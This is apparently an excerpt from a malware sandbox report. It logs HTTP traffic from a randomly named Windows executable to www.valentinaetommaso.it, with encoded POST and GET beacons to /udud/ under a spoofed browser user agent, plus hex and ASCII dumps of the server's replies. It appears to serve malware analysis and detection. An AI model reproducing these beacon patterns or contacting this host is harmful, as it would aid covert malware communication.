                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 73 45 74 36 59 73 6c 78 48 41 76 6e 78 75 53 38 6e 6f 34 35 55 50 33 33 4d 33 64 50 7a 44 4c 46 30 52 5a 2f 48 6d 48 71 2f 53 49 76 55 48 51 6f 7a 52 36 4e 44 57 33 4f 78 63 34 6f 6a 6d 36 4d 6e 74 59 78 52 2f 5a 70 77 6b 79 70 6d 44 68 53 7a 38 73 77 35 55 32 6d 7a 74 52 6b 6b 67 41 4e 30 48 6a 44 4e 64 54 48 67 63 65 35 47 58 4d 57 35 6a 2f 64 54 4d 6c 58 2b 32 68 78 46 62 6c 35 39 69 39 71 69 53 30 74 69 58 74 33 55 58 35 41 32 4f 54 6c 73 66 34 4f 44 76 41 54 61 2f 49 2f 73 53 5a 6e 72 58 6a 53 66 2f 55 48 58 75 56 57 72 61 56 2b 54 54 4d 44 63 2f 73 64 71 74 76 33 4d 39 38 6f 56 4c 70 64 32 49 78 4c 32 2f 2b 41 69 4f 48 74 46 6b 73 3d
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnxuS8no45UP33M3dPzDLF0RZ/HmHq/SIvUHQozR6NDW3Oxc4ojm6MntYxR/ZpwkypmDhSz8sw5U2mztRkkgAN0HjDNdTHgce5GXMW5j/dTMlX+2hxFbl59i9qiS0tiXt3UX5A2OTlsf4ODvATa/I/sSZnrXjSf/UHXuVWraV+TTMDc/sdqtv3M98oVLpd2IxL2/+AiOHtFks=
                                                                                                May 27, 2024 12:35:25.843925953 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:25 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=smvvp80sjvd506bou7008ikb7a; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 [TRUNCATED]
                                                                                                Data Ascii: 3794}mws? F_%"v,[ H"&%~?S4"N|XKUUo<3fO4UkZqI0?*yzT;jQ?*JU<aIi~EU*1I34]/$27PO4pFiBYy?4zE6Vl!"kpC&nz3a>9g0V4^t Q>vH4>449-lz{4fT_Z8w,E-^Ol~Lp#4{g`8\efqv~(,o<3$Q7S@ g3/kDo7ap;$m8&apAU>Qkd0,D>FGW'x2:MSY_*k?8`z'aE$[ZkS?3#EF*Z3XU/mt%bRZ-F5"![ju}aJhiS>%w'Qj28|1Y<7lGZk'k!7Bh:-^E+'|rg(qVQ7&m0X9<{{idN2<'ow0uCXW/{Q7
                                                                                                May 27, 2024 12:35:25.844014883 CEST1289INData Raw: c5 0c 3a c3 fd 6d 11 24 77 57 c1 14 a6 58 9c 9c 4c a7 3b 7f a3 ad e6 3c 76 28 34 df 50 62 ff cf 5e 05 82 b7 f2 ee 8d 96 b5 f7 2f e2 77 7f db 7d 14 1c 67 2e 14 d2 38 9b 3c 0a be ff 7e 37 7b 13 bc 73 93 60 16 df 04 27 19 54 d6 60 91 05 3b 15 23 f4
                                                                                                Data Ascii: :m$wWXL;<v(4Pb^/w}g.8<~7{s`'T`;#*lgwOcf:z1Hv*I@U+a#1gSeLDx-Ke1QuI@ze$NEr2$w0"@]0vwvs
                                                                                                May 27, 2024 12:35:25.844063997 CEST1289INData Raw: 9c c2 d5 c8 c5 3b 8e e3 31 ac 62 6f 3c f3 22 8c 2e a1 87 10 ee 4b 97 fe ce 1f c2 61 ef a7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 39 7a e0 1b f5 59 b9 4f f2 8f a2 c4 7a b4 6e c1 f1 77 47 90 1b c1 a3 9b 30 0d a1 2b c3 ec ee 68 12 0e 87 41 a4
                                                                                                Data Ascii: ;1bo<".Ka~yqq@L:9zYOznwG0+hA>VkEx\+?L,?~ZU'F~H3*SU]%UnTxP'hR@*"hwcf_fY5209];\h:1X5`5PN
                                                                                                May 27, 2024 12:35:25.844130039 CEST1289INData Raw: ab a3 30 49 95 e1 aa 84 75 09 81 51 d5 97 b5 61 99 7f 61 e6 0c e4 54 49 ad 5b 5b c9 86 d8 c1 54 1e 9f 3f 77 2e 4e ae 5f 9d 5f bc 7c 71 fe d2 79 72 ee 6c b6 06 95 11 08 96 53 26 16 ba 36 18 2f 91 ff 6b f0 b8 5e 64 19 9c eb f0 dc c3 b9 8e a7 24 84
                                                                                                Data Ascii: 0IuQaaTI[[T?w.N__|qyrlS&6/k^d$Aw ?sQ/X1(Xt?aCTduK&B:rKHJq;)H#)DNnpE6"n;~AbSWNzM1K$IBrK<UpcX:[2tnv1
                                                                                                May 27, 2024 12:35:25.844263077 CEST1289INData Raw: 03 74 c3 75 4d 89 07 11 23 c8 08 62 6d fd dc 70 81 80 5e 3d 55 08 4f 3d 28 ce 37 c5 0f ea b6 3a 10 cf 90 c1 4d f0 c5 61 b3 29 18 1e a8 67 10 53 96 07 a6 88 b4 16 5a 92 d6 3f 73 96 b1 a2 73 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 db 66 3b 88 4a
                                                                                                Data Ascii: tuM#bmp^=UO=(7:Ma)gSZ?ssbs$2Pf;J(w[.xC1FK:4s,R+B|8UO!@(r-M}3.^\<Flz}6]>OW/+bhA*Qg^NSuV+qFeOGz;Xup-H
                                                                                                May 27, 2024 12:35:25.844327927 CEST1289INData Raw: 7e f6 f2 f5 75 ff e7 93 eb ca d1 c8 9b a6 c1 5e 65 43 83 93 27 4f ce af cf 5f be 38 79 be 4d ed ab 67 e7 97 97 e8 b0 7f fa f2 ca 80 06 c2 08 ae ff 15 eb ab cf 18 0e 61 c3 f4 82 d2 84 42 6e c1 38 1b 83 43 a8 de 63 13 05 fb ce bf cb df cb e8 fa 99
                                                                                                Data Ascii: ~u^eC'O_8yMgaBn8CcD94$|l;M:}1g/hm^#Gb_=Gsq~[{[[6&~r SC?zU0q%"`-o<n5g)c$i D_$jzTf:^k%
                                                                                                May 27, 2024 12:35:25.844419003 CEST1289INData Raw: d2 25 4c cf b8 1d c9 3f 4f bc 14 02 74 9c 7f 0e d3 4b c5 14 4f 40 b9 70 6a bd 67 de 3d c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 33 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 4c cc 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c
                                                                                                Data Ascii: %L?OtKO@pjg={=:;(]3|RkOJQn|2L9qL&D?9>__n$zuu_RoHMcNrAo5}4Imq[9M|h=}nM~iN]uA)"hiwwjxi`W^SeP
                                                                                                May 27, 2024 12:35:25.844510078 CEST1289INData Raw: 74 9c 9d 14 17 97 ed 62 16 bd d4 91 be 60 3e a0 0f 2f c6 34 7a 90 80 e8 66 31 f5 92 9c e0 0f 8f 9f e3 86 77 81 8e 13 43 8a fb 46 ad e7 22 41 24 26 46 c5 71 cc f2 e1 0d e3 59 e8 23 b6 0b fd 3b 27 f9 db 62 a4 08 0d 03 13 62 a0 b8 89 d8 1b cb f0 11
                                                                                                Data Ascii: tb`>/4zf1wCF"A$&FqY#;'bbB`v;w1qcC0E-EJ\2$84a+%e\*SJ]1Qg4uj4x#,P*Dk"#9}2_h,7w{kP}j7B>|/Jr>/9q$
                                                                                                May 27, 2024 12:35:25.844573975 CEST1289INData Raw: 1e 14 7d 37 c3 86 6d f1 25 d8 3f 60 a5 be 86 be a0 9d 03 61 fe 72 41 b6 3d 83 b1 a4 09 8f 48 7a 1e e7 ab 43 fa 4b 58 41 ff 04 6e f8 e6 2b 11 bb 2f 16 f1 0d 5c b9 30 44 ee ad 3d 4f f0 55 3e 4c 18 81 5a 46 5d 58 21 c8 3e 94 58 bc a2 19 7c 24 e6 1c
                                                                                                Data Ascii: }7m%?`arA=HzCKXAn+/\0D=OU>LZF]X!>X|$Jw~0C}F-1]j }:]$[o(Zdz`}I"A1$2N7~Sv7&:S5E4;8]m)ODfZWXELJ
                                                                                                May 27, 2024 12:35:25.844588041 CEST1289INData Raw: 96 fa 20 9a af 02 78 c5 99 0b 5a b9 c0 66 09 33 69 36 6f 70 b3 a2 00 f1 a3 eb bb e3 37 f4 6a 11 70 ca af 45 db 50 8b d7 7f 5c 16 bb 58 32 2d 6b e3 c6 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 c2 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c
                                                                                                Data Ascii: xZf3i6op7jpEP\X2-kpO#xvp+y1?s3|OWQ[Llu=M7_vE (%3{V{?*3YPIgKopQ_<0K#F+:CCN[jiAKpPxU]dak!`8^Xy0d
                                                                                                May 27, 2024 12:35:26.029164076 CEST1289INData Raw: 62 48 f1 fd a1 62 94 0b 46 a8 bd c0 81 1b ee a8 5b aa ff 5a de ae 6f 01 9f 6b 92 f5 71 93 87 34 c2 37 98 cc 06 b8 17 80 47 30 16 72 57 ac 84 9c 50 54 93 f1 3b 17 52 cd 39 61 35 85 27 82 d6 1f 82 72 86 1b f8 ee 85 01 f3 fa b6 2f 91 62 72 b9 cc 0a
                                                                                                Data Ascii: bHbF[Zokq47G0rWPT;R9a5'r/brUab$y[)^IP<ncFck%\H,!!a)PM7Ziz-3O^1RDTW*#Bl1>R2]G,&>p_p6{ScL-]!


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                60192.168.11.30498903.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:28.285986900 CEST1700OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 73 45 74 36 59 73 6c 78 48 41 76 6e 78 75 53 38 6e 6f 34 35 55 50 33 33 4d 33 64 50 7a 44 4c 46 30 52 5a 2f 48 6d 48 71 2f 53 41 76 56 31 59 6f 30 43 53 4e 43 57 33 4f 34 38 34 72 6a 6d 37 51 6e 74 51 50 52 2f 64 66 77 69 75 70 6e 69 42 53 33 39 73 77 67 45 32 6d 76 64 52 68 37 51 41 55 30 48 7a 48 4e 63 76 48 67 63 65 35 47 57 63 57 70 69 2f 64 65 73 6c 55 75 6d 68 74 4f 37 6b 51 39 6d 5a 51 69 53 77 62 69 6e 4e 33 61 58 70 41 77 34 76 6c 76 2f 34 4d 41 76 42 57 61 2f 46 2f 73 53 74 56 72 58 37 34 66 39 45 48 64 71 51 78 2f 37 78 4a 50 6c 46 4c 57 72 52 69 68 4c 48 43 50 64 67 65 54 59 41 73 38 37 59 67 2f 4b 61 32 7a 65 4c 7a 66 6a 43 58 39 41 44 63 58 71 38 45 55 79 39 6e 5a 65 4d 69 6f 38 41 72 61 4f 2b 55 59 39 72 45 4c 72 52 62 64 45 48 32 6a 49 51 39 49 35 37 2f 54 65 57 63 50 52 73 6d 62 4c 43 37 47 48 32 43 6b 56 53 33 39 57 74 2f 71 5a 65 7a 33 51 70 6a 39 77 49 44 42 59 30 75 42 69 58 68 4b 49 50 31 44 4f 57 4a 45 71 59 6d 42 52 79 64 35 35 74 56 74 62 37 42 71 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnxuS8no45UP33M3dPzDLF0RZ/HmHq/SAvV1Yo0CSNCW3O484rjm7QntQPR/dfwiupniBS39swgE2mvdRh7QAU0HzHNcvHgce5GWcWpi/deslUumhtO7kQ9mZQiSwbinN3aXpAw4vlv/4MAvBWa/F/sStVrX74f9EHdqQx/7xJPlFLWrRihLHCPdgeTYAs87Yg/Ka2zeLzfjCX9ADcXq8EUy9nZeMio8AraO+UY9rELrRbdEH2jIQ9I57/TeWcPRsmbLC7GH2CkVS39Wt/qZez3Qpj9wIDBY0uBiXhKIP1DOWJEqYmBRyd55tVtb7BqzpCAuuiU1do1nbdVjUCxyh8HalcUL5W82mo1KlrPKKG8tMGEYJdZccHZLjJIZfXtQPEUYn+bHPbeS8tN99TTDU4QHDVTfzw4Ufph17/s/k7wGFWKmG7iZ9/2yEXr3+krAbQ+/vJEs9hGNNKAG+hIdkd4GXZTet7B8WhjkjAwUT/NsVO9rByRf//+w6TqUwjdKjTLI0lbJZPy+KxH3v6bDJ+AP9S9jLUzsBhQBM8woASeoN4/0n++aeOKaKdVoAp4O7GRA1QtcZ8K4JtDA0v/LhrD+2XySgkEkTDz/rpig4eCm7pTdUJoApZQoIvpRmS+NV9ua9jamCFakKU23pfkh7at0Vpgjyi7nwUFQ+OySUAvAQK12gw77yNo0ivpZTVvmD4xbwzqpIIo7Zc9tSk5j/Nqyh03p8C2NA1hncAMAc8LBMX3c4uyGAHW0pR0wyL9NSwsL5qHAqRGPOrtbsfwgcYn9srligj/wC6DRgSVL4EH8r3D5RFAXsq5eA0ZQ+R8DCCmDL/3hQEO5DUOBJnFIntQMlh2y9SrJ9bJp8dP1hL5Tpezm40TIrahR/O3SuclIDxwopGV6EO4ZmQoLNU88e5BB5mQP74GfwKt19jxJ5eWTEdorfR85nfKkTGBUvL0vbgWDyKj8kiEb0RQkm/CKRvoLT+Z4uDsJ6 [TRUNCATED]
                                                                                                May 27, 2024 12:35:28.566508055 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=d8iv0urgag0t0cnh4jbltmrciv; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 [TRUNCATED]
                                                                                                Data Ascii: 3794}mws? F_%"v,[ H"&%~?S4"N|XKUUo<3fO4UkZqI0?*yzT;jQ?*JU<aIi~EU*1I34]/$27PO4pFiBYy?4zE6Vl!"kpC&nz3a>9g0V4^t Q>vH4>449-lz{4fT_Z8w,E-^Ol~Lp#4{g`8\efqv~(,o<3$Q7S@ g3/kDo7ap;$m8&apAU>Qkd0,D>FGW'x2:MSY_*k?8`z'aE$[ZkS?3#EF*Z3XU/mt%bRZ-F5"![ju}aJhiS>%w'Qj28|1Y<7lGZk'k!7Bh:-^E+'|rg(qVQ7&m0X9<{{idN2<'ow0uCXW/{Q7
                                                                                                May 27, 2024 12:35:28.566606998 CEST1289INData Raw: c5 0c 3a c3 fd 6d 11 24 77 57 c1 14 a6 58 9c 9c 4c a7 3b 7f a3 ad e6 3c 76 28 34 df 50 62 ff cf 5e 05 82 b7 f2 ee 8d 96 b5 f7 2f e2 77 7f db 7d 14 1c 67 2e 14 d2 38 9b 3c 0a be ff 7e 37 7b 13 bc 73 93 60 16 df 04 27 19 54 d6 60 91 05 3b 15 23 f4
                                                                                                Data Ascii: :m$wWXL;<v(4Pb^/w}g.8<~7{s`'T`;#*lgwOcf:z1Hv*I@U+a#1gSeLDx-Ke1QuI@ze$NEr2$w0"@]0vwvs
                                                                                                May 27, 2024 12:35:28.566622019 CEST1289INData Raw: 9c c2 d5 c8 c5 3b 8e e3 31 ac 62 6f 3c f3 22 8c 2e a1 87 10 ee 4b 97 fe ce 1f c2 61 ef a7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 39 7a e0 1b f5 59 b9 4f f2 8f a2 c4 7a b4 6e c1 f1 77 47 90 1b c1 a3 9b 30 0d a1 2b c3 ec ee 68 12 0e 87 41 a4
                                                                                                Data Ascii: ;1bo<".Ka~yqq@L:9zYOznwG0+hA>VkEx\+?L,?~ZU'F~H3*SU]%UnTxP'hR@*"hwcf_fY5209];\h:1X5`5PN
                                                                                                May 27, 2024 12:35:28.566745996 CEST1289INData Raw: ab a3 30 49 95 e1 aa 84 75 09 81 51 d5 97 b5 61 99 7f 61 e6 0c e4 54 49 ad 5b 5b c9 86 d8 c1 54 1e 9f 3f 77 2e 4e ae 5f 9d 5f bc 7c 71 fe d2 79 72 ee 6c b6 06 95 11 08 96 53 26 16 ba 36 18 2f 91 ff 6b f0 b8 5e 64 19 9c eb f0 dc c3 b9 8e a7 24 84
                                                                                                Data Ascii: 0IuQaaTI[[T?w.N__|qyrlS&6/k^d$Aw ?sQ/X1(Xt?aCTduK&B:rKHJq;)H#)DNnpE6"n;~AbSWNzM1K$IBrK<UpcX:[2tnv1
                                                                                                May 27, 2024 12:35:28.566761017 CEST1289INData Raw: 03 74 c3 75 4d 89 07 11 23 c8 08 62 6d fd dc 70 81 80 5e 3d 55 08 4f 3d 28 ce 37 c5 0f ea b6 3a 10 cf 90 c1 4d f0 c5 61 b3 29 18 1e a8 67 10 53 96 07 a6 88 b4 16 5a 92 d6 3f 73 96 b1 a2 73 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 db 66 3b 88 4a
                                                                                                Data Ascii: tuM#bmp^=UO=(7:Ma)gSZ?ssbs$2Pf;J(w[.xC1FK:4s,R+B|8UO!@(r-M}3.^\<Flz}6]>OW/+bhA*Qg^NSuV+qFeOGz;Xup-H
                                                                                                May 27, 2024 12:35:28.566855907 CEST1289INData Raw: 7e f6 f2 f5 75 ff e7 93 eb ca d1 c8 9b a6 c1 5e 65 43 83 93 27 4f ce af cf 5f be 38 79 be 4d ed ab 67 e7 97 97 e8 b0 7f fa f2 ca 80 06 c2 08 ae ff 15 eb ab cf 18 0e 61 c3 f4 82 d2 84 42 6e c1 38 1b 83 43 a8 de 63 13 05 fb ce bf cb df cb e8 fa 99
                                                                                                Data Ascii: ~u^eC'O_8yMgaBn8CcD94$|l;M:}1g/hm^#Gb_=Gsq~[{[[6&~r SC?zU0q%"`-o<n5g)c$i D_$jzTf:^k%
                                                                                                May 27, 2024 12:35:28.567013025 CEST1289INData Raw: d2 25 4c cf b8 1d c9 3f 4f bc 14 02 74 9c 7f 0e d3 4b c5 14 4f 40 b9 70 6a bd 67 de 3d c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 33 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 4c cc 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c
                                                                                                Data Ascii: %L?OtKO@pjg={=:;(]3|RkOJQn|2L9qL&D?9>__n$zuu_RoHMcNrAo5}4Imq[9M|h=}nM~iN]uA)"hiwwjxi`W^SeP
                                                                                                May 27, 2024 12:35:28.567025900 CEST1289INData Raw: 74 9c 9d 14 17 97 ed 62 16 bd d4 91 be 60 3e a0 0f 2f c6 34 7a 90 80 e8 66 31 f5 92 9c e0 0f 8f 9f e3 86 77 81 8e 13 43 8a fb 46 ad e7 22 41 24 26 46 c5 71 cc f2 e1 0d e3 59 e8 23 b6 0b fd 3b 27 f9 db 62 a4 08 0d 03 13 62 a0 b8 89 d8 1b cb f0 11
                                                                                                Data Ascii: tb`>/4zf1wCF"A$&FqY#;'bbB`v;w1qcC0E-EJ\2$84a+%e\*SJ]1Qg4uj4x#,P*Dk"#9}2_h,7w{kP}j7B>|/Jr>/9q$
                                                                                                May 27, 2024 12:35:28.567051888 CEST1289INData Raw: 1e 14 7d 37 c3 86 6d f1 25 d8 3f 60 a5 be 86 be a0 9d 03 61 fe 72 41 b6 3d 83 b1 a4 09 8f 48 7a 1e e7 ab 43 fa 4b 58 41 ff 04 6e f8 e6 2b 11 bb 2f 16 f1 0d 5c b9 30 44 ee ad 3d 4f f0 55 3e 4c 18 81 5a 46 5d 58 21 c8 3e 94 58 bc a2 19 7c 24 e6 1c
                                                                                                Data Ascii: }7m%?`arA=HzCKXAn+/\0D=OU>LZF]X!>X|$Jw~0C}F-1]j }:]$[o(Zdz`}I"A1$2N7~Sv7&:S5E4;8]m)ODfZWXELJ
                                                                                                May 27, 2024 12:35:28.567064047 CEST1289INData Raw: 96 fa 20 9a af 02 78 c5 99 0b 5a b9 c0 66 09 33 69 36 6f 70 b3 a2 00 f1 a3 eb bb e3 37 f4 6a 11 70 ca af 45 db 50 8b d7 7f 5c 16 bb 58 32 2d 6b e3 c6 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 c2 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c
                                                                                                Data Ascii: xZf3i6op7jpEP\X2-kpO#xvp+y1?s3|OWQ[Llu=M7_vE (%3{V{?*3YPIgKopQ_<0K#F+:CCN[jiAKpPxU]dak!`8^Xy0d
                                                                                                May 27, 2024 12:35:28.753956079 CEST1289INData Raw: 62 48 f1 fd a1 62 94 0b 46 a8 bd c0 81 1b ee a8 5b aa ff 5a de ae 6f 01 9f 6b 92 f5 71 93 87 34 c2 37 98 cc 06 b8 17 80 47 30 16 72 57 ac 84 9c 50 54 93 f1 3b 17 52 cd 39 61 35 85 27 82 d6 1f 82 72 86 1b f8 ee 85 01 f3 fa b6 2f 91 62 72 b9 cc 0a
                                                                                                Data Ascii: bHbF[Zokq47G0rWPT;R9a5'r/brUab$y[)^IP<ncFck%\H,!!a)PM7Ziz-3O^1RDTW*#Bl1>R2]G,&>p_p6{ScL-]!


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                61192.168.11.30498913.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:31.002948999 CEST485OUTGET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:31.247622967 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=41lb3dcni2jqh97afn7lsn75l2; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 61 31 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 [TRUNCATED]
                                                                                                Data Ascii: a148<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="it"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="icon" 